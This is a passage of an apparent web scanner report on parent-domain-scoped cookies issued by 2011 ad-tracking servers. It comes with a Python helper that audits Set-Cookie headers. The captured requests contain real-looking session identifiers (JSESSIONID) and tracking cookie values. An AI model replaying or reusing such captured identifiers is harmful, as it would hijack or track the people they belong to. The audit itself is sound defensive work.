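    "Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/\r\n"
    "Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "Date: Mon, 16 May 2011 01:55:01 GMT\r\n"
    "\r\n"
    "(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';\r\n"
)

# Name-based heuristic (an assumption of this example) for cookies that may
# carry a session or authentication token.
SESSION_NAME_HINTS = re.compile(r"sess|sid|token|auth", re.I)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attrs); attrs keys are
    lower-cased and flag attributes such as Secure map to an empty string."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip().strip('"'), attrs


def is_parent_domain(host, domain):
    """True when `domain` is a proper ancestor of `host` on a label boundary
    (RFC 6265 domain matching): the cookie is then sent to, and can be
    overwritten by, every host under `domain`, not only the issuer."""
    host = host.lower().rstrip(".")
    domain = domain.lower().strip(".")
    return host != domain and host.endswith("." + domain)


def is_deletion(attrs, now):
    """A Set-Cookie with Max-Age <= 0 or an Expires before `now` removes the
    cookie instead of setting it (adh="" above is one such deletion)."""
    if "max-age" in attrs:
        try:
            return int(attrs["max-age"]) <= 0
        except ValueError:
            return False
    if "expires" in attrs:
        try:
            return parsedate_to_datetime(attrs["expires"]) <= now
        except (TypeError, ValueError):
            return False
    return False


def audit_response(host, raw_response):
    """Return one finding per Set-Cookie header in `raw_response`, using the
    response's own Date header as the reference time for expiry checks."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        key, _, val = line.partition(":")
        if key:
            headers.append((key.strip().lower(), val.strip()))
    now = datetime.now(timezone.utc)
    for key, val in headers:
        if key == "date":
            try:
                now = parsedate_to_datetime(val)
            except (TypeError, ValueError):
                pass
    findings = []
    for key, val in headers:
        if key != "set-cookie":
            continue
        name, _value, attrs = parse_set_cookie(val)
        domain = attrs.get("domain", "")
        findings.append({
            "name": name,
            "domain": domain or None,
            "parent_scoped": bool(domain) and is_parent_domain(host, domain),
            "deletion": is_deletion(attrs, now),
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
            "session_like": bool(SESSION_NAME_HINTS.search(name)),
        })
    return findings


def parent_scoped_live(findings):
    """Names of cookies actually stored under a parent domain (deletions excluded)."""
    return [f["name"] for f in findings if f["parent_scoped"] and not f["deletion"]]


if __name__ == "__main__":
    results = audit_response(SAMPLE_HOST, SAMPLE_RESPONSE)
    for finding in results:
        print(finding)
    print("parent-scoped, live:", parent_scoped_live(results))
```

Run as a script it prints one finding per header; for the sample only clid survives as a live parent-scoped cookie, adh is a deletion and JSESSIONID is host-only. The session heuristic looks at names only, so an opaque value such as clid still needs the manual review the report recommends.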

12.11. http://action.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=media6degrees.com, issued by action.media6degrees.com; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1628 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B01CE493D943F3A2256745B41EB14658; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ezk00b3r0a0l0a50b; orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; rdrlst=4090spbll9m03000000053r050d6hll8nk20000000a3r0a15ztll9l28000000063r060dlzll9l28000000063r0601hvll8nk20000000a3r0a16iell9m03000000053r050msvll9m03000000053r0501g3ll8nk20000000a3r0a0e6mll9m03000000053r05; sglst=2050s90ill9m03000m30053r050l05505dlell9l28000000063r060l065065msll9l28000000063r060l06506c24ll9l28000000063r060l065061jzll8nk200z2400a3r0a0l0a50a; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:54:16 GMT

GIF89a.............!.......,...........D..;

12.12. http://ad.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=trafficmp.com, issued by ad.trafficmp.com; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1305510841 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv; T_25qb=77k%3Ayl0%3A1; rth=2-ll8nk2-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Mon, 16 May 2011 01:57:53 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_25qb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_82oo=jd9%3Az8g%3A1; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~z8g~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Content-Length: 0


12.13. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.adbrite.com, issued by ads.adbrite.com; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; rb2=ChMKBjY4NDMzORi49477EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083b0@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:58:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORj20p_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:58:26 GMT
Set-Cookie: vsd=0@1@4dd084c2@www.imiclk.com; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:58:26 GMT
Set-Cookie: rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

12.14. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lfstmedia.com
Path:   /mark/CRITEO_INCL_US

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (Domain=.lfstmedia.com, issued by ads.lfstmedia.com; see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mark/CRITEO_INCL_US?time=$$timestamp$$ HTTP/1.1
Host: ads.lfstmedia.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trx=ip3281-34Vp1f6RBda0qYQkS59hcA; adu=kFfviwdBGAG2fdQv1i6avvzeHSzTq9cE

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 16 May 2011 02:03:00 GMT
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: adm_8vhk7crnCultFM-9vPQgMQ=y1CPY_PMEQyXEGd0ba8GKWzq0JvFcZ8d2in7RLYOb7s+zdbkfv7ihR8pX3gyu+6g; Domain=.lfstmedia.com; Expires=Thu, 13-May-2021 02:03:00 GMT; Path=/
Pragma: no-cache
Cache-Control: must-revalidate
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43
P3P: CP="CAO PSA OUR"

GIF89a.............!.......,...........L..;

12.15. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=.revsci.net, issued by ads.revsci.net; see the Set-Cookie headers in the response below). Note that the first four Set-Cookie headers carry an Expires date in 1970 and therefore delete earlier values of rsi_us_1000000 and rsiPus_Tw8y under both Path=/adserver and Path=/; only the final two headers store cookies. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Tw8y="MLsXsF8ubi5n4BCjMHbCV2gEC6h3AhMm/qbJZjq8VFKBZFiot29LyxVRkwlFYB/Zd94k4drR1Zh1QFPNtapqMl8oAcbH8bPAaI3fID4jwY3x0LpAV0MvRMJQ0QGOBSXNT5lallTZdmpHKrec2FqdnV2GTpucEYp7kOvcu8lfQ49j8sdcltawc4Cn1Qg7/azvTUE3EBrW9n2Wr2+2vH+8ecK+yc2qKUDrtePZntX9Y1ci1nBSCTfZoTnvJn9U9TV+ekHBiQ1F/HNha7/5IblHPjVwBRAoUJvi33WtQ8i1nVyIE7MhCx7at5Uyo/qOIDwvw2Gi+0B5pTWhd4kzKm245oNOmtBdgGIL93lqSClgX1l6+Bm3JgnyHoJLpHvm3G4s3LEwNZE5D/R1bCjuA8RBSWOKtjVEPgdeYW38wM897HChogDtvYqD36ymo/MMpslX12uy7+Ww"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tw8y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tw8y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EFRe="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bm4bP9V6n0/+EkoPKhDxyym+KpE+UnSzY618JInjZ4Vc3SM3rDP9UJfDSkXg1eZEJ9HLo/9NVCpb9+N+saY7xF1GBUZXMcK1aeMOXP/obAgtoLIVPpP5p2fjSYhtBOPhumCT47DvXqC0WxEZc2TDtWV8rIq0VYJyrB526WlEN32NvjJe2uvbUMygIKnXNAW/AFS2Cdh6UElOOTpD4aZdk9fgCnljiBDJVFj4NlURCJQYL0PUxpDs8c3jgnWAbcm3alSssJ7Cb39tuHUQmW82lxx1e8sus3nHtJM+GM96RXR/2JV0pbo+ZUJ0RuWnlag2CVFsnnhRCI/tQuePjthQWfj08W8edxeZLER9LxUCEWSzBdbMi0ptxQFrq2Qf9ssen3OdR7OfUXgrAM="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:59:00 GMT


12.16. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=.revsci.net, issued by ads.revsci.net; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=2034736289642.7512?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsiPus_-pah="MLsXsF8ubi5n4BCj6Iwxj+ChgP9MmEaXnPMMWCjo3/gXOBYBOsgcKGmq7J3s8bEELtEtuQAUMg2twd9L78Ckve4PRhn+TnbZZgzQjU6BafW/eRnGpuy0oiVFGmY3Anfh17v9nbyJlC6WkITH1s7atNzA94Byz2ahQWWSkgzSBeq/m5yGRHDBWVE3WQKWx1rq0Os5JD95fxkgtM/XMh8ZPItRGPdDs6DkKTj57w7NLvTrFYiNQkaAQXrvVknibEJ2Q3EEI6f88RHWUnsWlXdsumEcJ4AZQLWPtn8GUbAKtpnD2xZHycOIz+UUUTimvw1mPizedaDoQ3uueOR55nVFaPfwnliNg2DvaGTMKiNaZXNWSnvgXbxjGssTFwevLvWOYWkMVKVnyPJt2uFto8uxRa0p6J53cfm74Hg2akeLDOYR8NEH+Q6UGJLQxN+ehQIy1YbeY76PrG8="; rsi_us_1000000="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"; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-pah=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__g3U="MLsXsF8ubi5n4BCzUIwkp6Hql1A6rO31WVmGRQQBkAeIWvwl0z+NLXGYQV3jYHIoKow4I8MNFXoBKaA0Dmym+Ku0dkfouHaJ+u3AheYIQwDLhXakPiNxvHdXkqX5nUNUQkvVx6Eaj5O9v5Xcjbp9UvegWmGbavTTK0jhnIGcVnPgFyp+WCoXFJ/YCb6xoCFz5/OtP/XFXJ6ARSf8Il8eHtjSQ07DH7e40npqJyO7tdQkVxepqkO4h33GXxQRehGwbDMII/X964qnDBZK+hvoJgSDVTQJgbfrr9VStGZJoYAHl4yP0wCaqMqXev3nQn//YT1f5MDp3TFC5DYQRL8HsygEMgbtautJJDJrFXZfXon5bJIGfS4r2gaBvuG1hs92eLagBvBS0sDmmYhgZ3tvqzlxJ3x0XqGk1zoQfFcwPzRIYEbWjaJNG6mOleL0WvyW7crhgFR1u/9g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:34:15 GMT


12.17. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (Domain=.revsci.net, issued by ads.revsci.net; see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1351916219573.468?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gdpk="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4OwXRvHjhIt8FcDXoBi5XqlnhuXhK+k7hhaJI9zU0CAuIx0hsbmph+ZwgGeQeavIa1wELH/jDnMrkr5ZpsnIwCKEGtcM070rhnKCJbnPgv/JP980S3TweqoaKG8kJudfxHiM2PjYCc+D3Kv4ZPeg4bJTfdrbQ7bptZJ4LtegkTcumqkO4h33GXxQRehGwbDMII/X9E+oPGwCg/xwUJgSDVTQJgbfrr9VStGZJoYAHD5K//QGfoiqTdSk5kXeo+0t3uTulN8p2Syu4yooLi8xN0kkhhQFMaSloQAt+9Q+rZ1/e100i8gaSvv7Fip5trVtjKqBYmXFoYwBh69bL8neIF3GxHL2kSRBU3s9WTic7L/IPVuew0+vAT3v8lsmTxk7equVE"; 
